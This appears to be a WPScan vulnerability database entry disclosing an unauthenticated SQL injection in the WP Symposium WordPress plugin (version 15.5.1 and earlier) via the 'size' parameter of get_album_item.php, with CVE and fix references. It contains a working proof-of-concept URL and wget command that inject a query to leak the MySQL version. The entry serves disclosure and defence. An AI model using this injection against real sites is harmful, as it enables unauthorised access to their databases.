WP Symposium <= 15.5.1 - Unauthenticated SQL Injection



Description
Wordpress plugin wp-symposium version 15.5.1 (and probably all existing previous versions) suffers from an unauthenticated SQL Injection in get_album_item.php, parameter 'size'.

The issue is exploitable even if the plugin is deactivated.
Proof of Concept
PoC URL : http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--

PoC Command (Unix) : wget "http://localhost/<WP-path>/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--" -O output.txt

In the content of the HTTP response you will find the MySQL version, for example :
5.5.44-0+deb7u1

Affects Plugin

fixed in version 15.8
- plugin closed

References

CVE 2015-6522
ExploitDB 37824
URL https://plugins.trac.wordpress.org/changeset/1214872/wp-symposium

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter PizzaHatHacker
Views 4948
Verified Yes
WPVDB ID 8140

Timeline

Publicly Published 2015-08-09 (almost 5 years ago)
Added 2015-08-09 (almost 5 years ago)
Last Updated 2019-10-22 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin